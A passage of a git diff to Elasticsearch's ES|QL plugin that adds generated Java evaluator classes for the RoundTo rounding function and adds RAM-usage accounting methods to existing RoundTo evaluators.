java.lang.IllegalArgumentException; +import java.lang.Override; +import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; +import org.elasticsearch.compute.data.Block; +import org.elasticsearch.compute.data.IntBlock; +import org.elasticsearch.compute.data.IntVector; +import org.elasticsearch.compute.data.Page; +import org.elasticsearch.compute.operator.DriverContext; +import org.elasticsearch.compute.operator.EvalOperator; +import org.elasticsearch.compute.operator.Warnings; +import org.elasticsearch.core.Releasables; +import org.elasticsearch.xpack.esql.core.tree.Source; + +/** + * {@link EvalOperator.ExpressionEvaluator} implementation for {@link RoundToInt}. + * This class is generated. Edit {@code EvaluatorImplementer} instead. 
+ */ +public final class RoundToInt7Evaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(RoundToInt7Evaluator.class); + + private final Source source; + + private final EvalOperator.ExpressionEvaluator field; + + private final int p0; + + private final int p1; + + private final int p2; + + private final int p3; + + private final int p4; + + private final int p5; + + private final int p6; + + private final DriverContext driverContext; + + private Warnings warnings; + + public RoundToInt7Evaluator(Source source, EvalOperator.ExpressionEvaluator field, int p0, int p1, + int p2, int p3, int p4, int p5, int p6, DriverContext driverContext) { + this.source = source; + this.field = field; + this.p0 = p0; + this.p1 = p1; + this.p2 = p2; + this.p3 = p3; + this.p4 = p4; + this.p5 = p5; + this.p6 = p6; + this.driverContext = driverContext; + } + + @Override + public Block eval(Page page) { + try (IntBlock fieldBlock = (IntBlock) field.eval(page)) { + IntVector fieldVector = fieldBlock.asVector(); + if (fieldVector == null) { + return eval(page.getPositionCount(), fieldBlock); + } + return eval(page.getPositionCount(), fieldVector).asBlock(); + } + } + + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += field.baseRamBytesUsed(); + return baseRamBytesUsed; + } + + public IntBlock eval(int positionCount, IntBlock fieldBlock) { + try(IntBlock.Builder result = driverContext.blockFactory().newIntBlockBuilder(positionCount)) { + position: for (int p = 0; p < positionCount; p++) { + if (fieldBlock.isNull(p)) { + result.appendNull(); + continue position; + } + if (fieldBlock.getValueCount(p) != 1) { + if (fieldBlock.getValueCount(p) > 1) { + warnings().registerException(new IllegalArgumentException("single-value function encountered multi-value")); + } + result.appendNull(); + continue position; + } + result.appendInt(RoundToInt.process(fieldBlock.getInt(fieldBlock.getFirstValueIndex(p)), this.p0, this.p1, this.p2, this.p3, this.p4, this.p5, this.p6)); + } + return result.build(); + } + } + + public IntVector eval(int positionCount, IntVector fieldVector) { + try(IntVector.FixedBuilder result = driverContext.blockFactory().newIntVectorFixedBuilder(positionCount)) { + position: for (int p = 0; p < positionCount; p++) { + result.appendInt(p, RoundToInt.process(fieldVector.getInt(p), this.p0, this.p1, this.p2, this.p3, this.p4, this.p5, this.p6)); + } + return result.build(); + } + } + + @Override + public String toString() { + return "RoundToInt7Evaluator[" + "field=" + field + ", p0=" + p0 + ", p1=" + p1 + ", p2=" + p2 + ", p3=" + p3 + ", p4=" + p4 + ", p5=" + p5 + ", p6=" + p6 + "]"; + } + + @Override + public void close() { + Releasables.closeExpectNoException(field); + } + + private Warnings warnings() { + if (warnings == null) { + this.warnings = Warnings.createWarnings( + driverContext.warningsMode(), + source.source().getLineNumber(), + source.source().getColumnNumber(), + source.text() + ); + } + return warnings; + } + + static class Factory implements EvalOperator.ExpressionEvaluator.Factory { + private final Source source; + + private final EvalOperator.ExpressionEvaluator.Factory field; + + private final int p0; + + private final int p1; + + private final int p2; + + private final int p3; + + private final int p4; + + private final int p5; + + private final int p6; + + public Factory(Source source, EvalOperator.ExpressionEvaluator.Factory field, 
int p0, int p1, + int p2, int p3, int p4, int p5, int p6) { + this.source = source; + this.field = field; + this.p0 = p0; + this.p1 = p1; + this.p2 = p2; + this.p3 = p3; + this.p4 = p4; + this.p5 = p5; + this.p6 = p6; + } + + @Override + public RoundToInt7Evaluator get(DriverContext context) { + return new RoundToInt7Evaluator(source, field.get(context), p0, p1, p2, p3, p4, p5, p6, context); + } + + @Override + public String toString() { + return "RoundToInt7Evaluator[" + "field=" + field + ", p0=" + p0 + ", p1=" + p1 + ", p2=" + p2 + ", p3=" + p3 + ", p4=" + p4 + ", p5=" + p5 + ", p6=" + p6 + "]"; + } + } +} diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToInt8Evaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToInt8Evaluator.java new file mode 100644 index 0000000000000..128fc399046d3 --- /dev/null +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToInt8Evaluator.java @@ -0,0 +1,181 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License +// 2.0; you may not use this file except in compliance with the Elastic License +// 2.0. +package org.elasticsearch.xpack.esql.expression.function.scalar.math; + +import java.lang.IllegalArgumentException; +import java.lang.Override; +import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; +import org.elasticsearch.compute.data.Block; +import org.elasticsearch.compute.data.IntBlock; +import org.elasticsearch.compute.data.IntVector; +import org.elasticsearch.compute.data.Page; +import org.elasticsearch.compute.operator.DriverContext; +import org.elasticsearch.compute.operator.EvalOperator; +import org.elasticsearch.compute.operator.Warnings; +import org.elasticsearch.core.Releasables; +import org.elasticsearch.xpack.esql.core.tree.Source; + +/** + * {@link EvalOperator.ExpressionEvaluator} implementation for {@link RoundToInt}. + * This class is generated. Edit {@code EvaluatorImplementer} instead. 
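+ * <p>
+ * Arity-specialized variants such as this one presumably exist so the hot loop
+ * compares each value against rounding points held in plain fields: the call
+ * {@code RoundToInt.process(v, p0, ..., p7)} can then compile down to
+ * straight-line comparisons with no array lookups. Point sets too large for a
+ * dedicated variant fall back to the linear- and binary-search evaluators
+ * touched later in this patch.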
+ */ +public final class RoundToInt8Evaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(RoundToInt8Evaluator.class); + + private final Source source; + + private final EvalOperator.ExpressionEvaluator field; + + private final int p0; + + private final int p1; + + private final int p2; + + private final int p3; + + private final int p4; + + private final int p5; + + private final int p6; + + private final int p7; + + private final DriverContext driverContext; + + private Warnings warnings; + + public RoundToInt8Evaluator(Source source, EvalOperator.ExpressionEvaluator field, int p0, int p1, + int p2, int p3, int p4, int p5, int p6, int p7, DriverContext driverContext) { + this.source = source; + this.field = field; + this.p0 = p0; + this.p1 = p1; + this.p2 = p2; + this.p3 = p3; + this.p4 = p4; + this.p5 = p5; + this.p6 = p6; + this.p7 = p7; + this.driverContext = driverContext; + } + + @Override + public Block eval(Page page) { + try (IntBlock fieldBlock = (IntBlock) field.eval(page)) { + IntVector fieldVector = fieldBlock.asVector(); + if (fieldVector == null) { + return eval(page.getPositionCount(), fieldBlock); + } + return eval(page.getPositionCount(), fieldVector).asBlock(); + } + } + + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += field.baseRamBytesUsed(); + return baseRamBytesUsed; + } + + public IntBlock eval(int positionCount, IntBlock fieldBlock) { + try(IntBlock.Builder result = driverContext.blockFactory().newIntBlockBuilder(positionCount)) { + position: for (int p = 0; p < positionCount; p++) { + if (fieldBlock.isNull(p)) { + result.appendNull(); + continue position; + } + if (fieldBlock.getValueCount(p) != 1) { + if (fieldBlock.getValueCount(p) > 1) { + warnings().registerException(new IllegalArgumentException("single-value function encountered multi-value")); + } + result.appendNull(); + continue position; + } + result.appendInt(RoundToInt.process(fieldBlock.getInt(fieldBlock.getFirstValueIndex(p)), this.p0, this.p1, this.p2, this.p3, this.p4, this.p5, this.p6, this.p7)); + } + return result.build(); + } + } + + public IntVector eval(int positionCount, IntVector fieldVector) { + try(IntVector.FixedBuilder result = driverContext.blockFactory().newIntVectorFixedBuilder(positionCount)) { + position: for (int p = 0; p < positionCount; p++) { + result.appendInt(p, RoundToInt.process(fieldVector.getInt(p), this.p0, this.p1, this.p2, this.p3, this.p4, this.p5, this.p6, this.p7)); + } + return result.build(); + } + } + + @Override + public String toString() { + return "RoundToInt8Evaluator[" + "field=" + field + ", p0=" + p0 + ", p1=" + p1 + ", p2=" + p2 + ", p3=" + p3 + ", p4=" + p4 + ", p5=" + p5 + ", p6=" + p6 + ", p7=" + p7 + "]"; + } + + @Override + public void close() { + Releasables.closeExpectNoException(field); + } + + private Warnings warnings() { + if (warnings == null) { + this.warnings = Warnings.createWarnings( + driverContext.warningsMode(), + source.source().getLineNumber(), + source.source().getColumnNumber(), + source.text() + ); + } + return warnings; + } + + static class Factory implements EvalOperator.ExpressionEvaluator.Factory { + private final Source source; + + private final EvalOperator.ExpressionEvaluator.Factory field; + + private final int p0; + + private final int p1; + + private final int p2; + + private final int p3; + + private final int p4; + + private final int p5; + + private final int p6; 
+ + private final int p7; + + public Factory(Source source, EvalOperator.ExpressionEvaluator.Factory field, int p0, int p1, + int p2, int p3, int p4, int p5, int p6, int p7) { + this.source = source; + this.field = field; + this.p0 = p0; + this.p1 = p1; + this.p2 = p2; + this.p3 = p3; + this.p4 = p4; + this.p5 = p5; + this.p6 = p6; + this.p7 = p7; + } + + @Override + public RoundToInt8Evaluator get(DriverContext context) { + return new RoundToInt8Evaluator(source, field.get(context), p0, p1, p2, p3, p4, p5, p6, p7, context); + } + + @Override + public String toString() { + return "RoundToInt8Evaluator[" + "field=" + field + ", p0=" + p0 + ", p1=" + p1 + ", p2=" + p2 + ", p3=" + p3 + ", p4=" + p4 + ", p5=" + p5 + ", p6=" + p6 + ", p7=" + p7 + "]"; + } + } +} diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToInt9Evaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToInt9Evaluator.java new file mode 100644 index 0000000000000..130926e4c21d4 --- /dev/null +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToInt9Evaluator.java @@ -0,0 +1,187 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License +// 2.0; you may not use this file except in compliance with the Elastic License +// 2.0. +package org.elasticsearch.xpack.esql.expression.function.scalar.math; + +import java.lang.IllegalArgumentException; +import java.lang.Override; +import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; +import org.elasticsearch.compute.data.Block; +import org.elasticsearch.compute.data.IntBlock; +import org.elasticsearch.compute.data.IntVector; +import org.elasticsearch.compute.data.Page; +import org.elasticsearch.compute.operator.DriverContext; +import org.elasticsearch.compute.operator.EvalOperator; +import org.elasticsearch.compute.operator.Warnings; +import org.elasticsearch.core.Releasables; +import org.elasticsearch.xpack.esql.core.tree.Source; + +/** + * {@link EvalOperator.ExpressionEvaluator} implementation for {@link RoundToInt}. + * This class is generated. Edit {@code EvaluatorImplementer} instead. 
+ */ +public final class RoundToInt9Evaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(RoundToInt9Evaluator.class); + + private final Source source; + + private final EvalOperator.ExpressionEvaluator field; + + private final int p0; + + private final int p1; + + private final int p2; + + private final int p3; + + private final int p4; + + private final int p5; + + private final int p6; + + private final int p7; + + private final int p8; + + private final DriverContext driverContext; + + private Warnings warnings; + + public RoundToInt9Evaluator(Source source, EvalOperator.ExpressionEvaluator field, int p0, int p1, + int p2, int p3, int p4, int p5, int p6, int p7, int p8, DriverContext driverContext) { + this.source = source; + this.field = field; + this.p0 = p0; + this.p1 = p1; + this.p2 = p2; + this.p3 = p3; + this.p4 = p4; + this.p5 = p5; + this.p6 = p6; + this.p7 = p7; + this.p8 = p8; + this.driverContext = driverContext; + } + + @Override + public Block eval(Page page) { + try (IntBlock fieldBlock = (IntBlock) field.eval(page)) { + IntVector fieldVector = fieldBlock.asVector(); + if (fieldVector == null) { + return eval(page.getPositionCount(), fieldBlock); + } + return eval(page.getPositionCount(), fieldVector).asBlock(); + } + } + + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += field.baseRamBytesUsed(); + return baseRamBytesUsed; + } + + public IntBlock eval(int positionCount, IntBlock fieldBlock) { + try(IntBlock.Builder result = driverContext.blockFactory().newIntBlockBuilder(positionCount)) { + position: for (int p = 0; p < positionCount; p++) { + if (fieldBlock.isNull(p)) { + result.appendNull(); + continue position; + } + if (fieldBlock.getValueCount(p) != 1) { + if (fieldBlock.getValueCount(p) > 1) { + warnings().registerException(new IllegalArgumentException("single-value function encountered multi-value")); + } + result.appendNull(); + continue position; + } + result.appendInt(RoundToInt.process(fieldBlock.getInt(fieldBlock.getFirstValueIndex(p)), this.p0, this.p1, this.p2, this.p3, this.p4, this.p5, this.p6, this.p7, this.p8)); + } + return result.build(); + } + } + + public IntVector eval(int positionCount, IntVector fieldVector) { + try(IntVector.FixedBuilder result = driverContext.blockFactory().newIntVectorFixedBuilder(positionCount)) { + position: for (int p = 0; p < positionCount; p++) { + result.appendInt(p, RoundToInt.process(fieldVector.getInt(p), this.p0, this.p1, this.p2, this.p3, this.p4, this.p5, this.p6, this.p7, this.p8)); + } + return result.build(); + } + } + + @Override + public String toString() { + return "RoundToInt9Evaluator[" + "field=" + field + ", p0=" + p0 + ", p1=" + p1 + ", p2=" + p2 + ", p3=" + p3 + ", p4=" + p4 + ", p5=" + p5 + ", p6=" + p6 + ", p7=" + p7 + ", p8=" + p8 + "]"; + } + + @Override + public void close() { + Releasables.closeExpectNoException(field); + } + + private Warnings warnings() { + if (warnings == null) { + this.warnings = Warnings.createWarnings( + driverContext.warningsMode(), + source.source().getLineNumber(), + source.source().getColumnNumber(), + source.text() + ); + } + return warnings; + } + + static class Factory implements EvalOperator.ExpressionEvaluator.Factory { + private final Source source; + + private final EvalOperator.ExpressionEvaluator.Factory field; + + private final int p0; + + private final int p1; + + private final int p2; + + private final 
int p3; + + private final int p4; + + private final int p5; + + private final int p6; + + private final int p7; + + private final int p8; + + public Factory(Source source, EvalOperator.ExpressionEvaluator.Factory field, int p0, int p1, + int p2, int p3, int p4, int p5, int p6, int p7, int p8) { + this.source = source; + this.field = field; + this.p0 = p0; + this.p1 = p1; + this.p2 = p2; + this.p3 = p3; + this.p4 = p4; + this.p5 = p5; + this.p6 = p6; + this.p7 = p7; + this.p8 = p8; + } + + @Override + public RoundToInt9Evaluator get(DriverContext context) { + return new RoundToInt9Evaluator(source, field.get(context), p0, p1, p2, p3, p4, p5, p6, p7, p8, context); + } + + @Override + public String toString() { + return "RoundToInt9Evaluator[" + "field=" + field + ", p0=" + p0 + ", p1=" + p1 + ", p2=" + p2 + ", p3=" + p3 + ", p4=" + p4 + ", p5=" + p5 + ", p6=" + p6 + ", p7=" + p7 + ", p8=" + p8 + "]"; + } + } +} diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToIntBinarySearchEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToIntBinarySearchEvaluator.java index e0bb8becdcca6..ea4b69c69df23 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToIntBinarySearchEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToIntBinarySearchEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.IntBlock; import org.elasticsearch.compute.data.IntVector; @@ -22,6 +23,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
*/ public final class RoundToIntBinarySearchEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(RoundToIntBinarySearchEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator field; @@ -51,6 +54,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += field.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public IntBlock eval(int positionCount, IntBlock fieldBlock) { try(IntBlock.Builder result = driverContext.blockFactory().newIntBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToIntLinearSearchEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToIntLinearSearchEvaluator.java index ed703c3c994f1..0637446d1e980 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToIntLinearSearchEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToIntLinearSearchEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.IntBlock; import org.elasticsearch.compute.data.IntVector; @@ -22,6 +23,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class RoundToIntLinearSearchEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(RoundToIntLinearSearchEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator field; @@ -51,6 +54,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += field.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public IntBlock eval(int positionCount, IntBlock fieldBlock) { try(IntBlock.Builder result = driverContext.blockFactory().newIntBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToLong10Evaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToLong10Evaluator.java new file mode 100644 index 0000000000000..b055b25d4cec1 --- /dev/null +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToLong10Evaluator.java @@ -0,0 +1,194 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License +// 2.0; you may not use this file except in compliance with the Elastic License +// 2.0. 
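+// The baseRamBytesUsed() override that this patch adds across the RoundTo
+// evaluators follows one recursive pattern: report the evaluator's own shallow
+// size, precomputed once with RamUsageEstimator.shallowSizeOfInstance, plus
+// whatever the wrapped field evaluator reports:
+//
+//   long total = BASE_RAM_BYTES_USED + field.baseRamBytesUsed();
+//
+// presumably so the compute engine can account for the fixed footprint of a
+// whole evaluator tree without walking it reflectively at runtime.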
+package org.elasticsearch.xpack.esql.expression.function.scalar.math; + +import java.lang.IllegalArgumentException; +import java.lang.Override; +import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; +import org.elasticsearch.compute.data.Block; +import org.elasticsearch.compute.data.LongBlock; +import org.elasticsearch.compute.data.LongVector; +import org.elasticsearch.compute.data.Page; +import org.elasticsearch.compute.operator.DriverContext; +import org.elasticsearch.compute.operator.EvalOperator; +import org.elasticsearch.compute.operator.Warnings; +import org.elasticsearch.core.Releasables; +import org.elasticsearch.xpack.esql.core.tree.Source; + +/** + * {@link EvalOperator.ExpressionEvaluator} implementation for {@link RoundToLong}. + * This class is generated. Edit {@code EvaluatorImplementer} instead. + */ +public final class RoundToLong10Evaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(RoundToLong10Evaluator.class); + + private final Source source; + + private final EvalOperator.ExpressionEvaluator field; + + private final long p0; + + private final long p1; + + private final long p2; + + private final long p3; + + private final long p4; + + private final long p5; + + private final long p6; + + private final long p7; + + private final long p8; + + private final long p9; + + private final DriverContext driverContext; + + private Warnings warnings; + + public RoundToLong10Evaluator(Source source, EvalOperator.ExpressionEvaluator field, long p0, + long p1, long p2, long p3, long p4, long p5, long p6, long p7, long p8, long p9, + DriverContext driverContext) { + this.source = source; + this.field = field; + this.p0 = p0; + this.p1 = p1; + this.p2 = p2; + this.p3 = p3; + this.p4 = p4; + this.p5 = p5; + this.p6 = p6; + this.p7 = p7; + this.p8 = p8; + this.p9 = p9; + this.driverContext = driverContext; + } + + @Override + public Block eval(Page page) { + try (LongBlock fieldBlock = (LongBlock) field.eval(page)) { + LongVector fieldVector = fieldBlock.asVector(); + if (fieldVector == null) { + return eval(page.getPositionCount(), fieldBlock); + } + return eval(page.getPositionCount(), fieldVector).asBlock(); + } + } + + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += field.baseRamBytesUsed(); + return baseRamBytesUsed; + } + + public LongBlock eval(int positionCount, LongBlock fieldBlock) { + try(LongBlock.Builder result = driverContext.blockFactory().newLongBlockBuilder(positionCount)) { + position: for (int p = 0; p < positionCount; p++) { + if (fieldBlock.isNull(p)) { + result.appendNull(); + continue position; + } + if (fieldBlock.getValueCount(p) != 1) { + if (fieldBlock.getValueCount(p) > 1) { + warnings().registerException(new IllegalArgumentException("single-value function encountered multi-value")); + } + result.appendNull(); + continue position; + } + result.appendLong(RoundToLong.process(fieldBlock.getLong(fieldBlock.getFirstValueIndex(p)), this.p0, this.p1, this.p2, this.p3, this.p4, this.p5, this.p6, this.p7, this.p8, this.p9)); + } + return result.build(); + } + } + + public LongVector eval(int positionCount, LongVector fieldVector) { + try(LongVector.FixedBuilder result = driverContext.blockFactory().newLongVectorFixedBuilder(positionCount)) { + position: for (int p = 0; p < positionCount; p++) { + result.appendLong(p, RoundToLong.process(fieldVector.getLong(p), this.p0, this.p1, this.p2, 
this.p3, this.p4, this.p5, this.p6, this.p7, this.p8, this.p9)); + } + return result.build(); + } + } + + @Override + public String toString() { + return "RoundToLong10Evaluator[" + "field=" + field + ", p0=" + p0 + ", p1=" + p1 + ", p2=" + p2 + ", p3=" + p3 + ", p4=" + p4 + ", p5=" + p5 + ", p6=" + p6 + ", p7=" + p7 + ", p8=" + p8 + ", p9=" + p9 + "]"; + } + + @Override + public void close() { + Releasables.closeExpectNoException(field); + } + + private Warnings warnings() { + if (warnings == null) { + this.warnings = Warnings.createWarnings( + driverContext.warningsMode(), + source.source().getLineNumber(), + source.source().getColumnNumber(), + source.text() + ); + } + return warnings; + } + + static class Factory implements EvalOperator.ExpressionEvaluator.Factory { + private final Source source; + + private final EvalOperator.ExpressionEvaluator.Factory field; + + private final long p0; + + private final long p1; + + private final long p2; + + private final long p3; + + private final long p4; + + private final long p5; + + private final long p6; + + private final long p7; + + private final long p8; + + private final long p9; + + public Factory(Source source, EvalOperator.ExpressionEvaluator.Factory field, long p0, long p1, + long p2, long p3, long p4, long p5, long p6, long p7, long p8, long p9) { + this.source = source; + this.field = field; + this.p0 = p0; + this.p1 = p1; + this.p2 = p2; + this.p3 = p3; + this.p4 = p4; + this.p5 = p5; + this.p6 = p6; + this.p7 = p7; + this.p8 = p8; + this.p9 = p9; + } + + @Override + public RoundToLong10Evaluator get(DriverContext context) { + return new RoundToLong10Evaluator(source, field.get(context), p0, p1, p2, p3, p4, p5, p6, p7, p8, p9, context); + } + + @Override + public String toString() { + return "RoundToLong10Evaluator[" + "field=" + field + ", p0=" + p0 + ", p1=" + p1 + ", p2=" + p2 + ", p3=" + p3 + ", p4=" + p4 + ", p5=" + p5 + ", p6=" + p6 + ", p7=" + p7 + ", p8=" + p8 + ", p9=" + p9 + "]"; + } + } +} diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToLong1Evaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToLong1Evaluator.java index d753cefa6a59e..a243b9244d489 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToLong1Evaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToLong1Evaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.LongBlock; import org.elasticsearch.compute.data.LongVector; @@ -22,6 +23,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
*/ public final class RoundToLong1Evaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(RoundToLong1Evaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator field; @@ -51,6 +54,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += field.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public LongBlock eval(int positionCount, LongBlock fieldBlock) { try(LongBlock.Builder result = driverContext.blockFactory().newLongBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToLong2Evaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToLong2Evaluator.java index 742e69ed8d8dd..30a91bd4c65c8 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToLong2Evaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToLong2Evaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.LongBlock; import org.elasticsearch.compute.data.LongVector; @@ -22,6 +23,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class RoundToLong2Evaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(RoundToLong2Evaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator field; @@ -54,6 +57,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += field.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public LongBlock eval(int positionCount, LongBlock fieldBlock) { try(LongBlock.Builder result = driverContext.blockFactory().newLongBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToLong3Evaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToLong3Evaluator.java index 9f2eebd25cae2..d2262055cb464 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToLong3Evaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToLong3Evaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.LongBlock; import org.elasticsearch.compute.data.LongVector; @@ -22,6 +23,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
*/ public final class RoundToLong3Evaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(RoundToLong3Evaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator field; @@ -57,6 +60,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += field.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public LongBlock eval(int positionCount, LongBlock fieldBlock) { try(LongBlock.Builder result = driverContext.blockFactory().newLongBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToLong4Evaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToLong4Evaluator.java index f479de31dd6aa..2c1191e59fc95 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToLong4Evaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToLong4Evaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.LongBlock; import 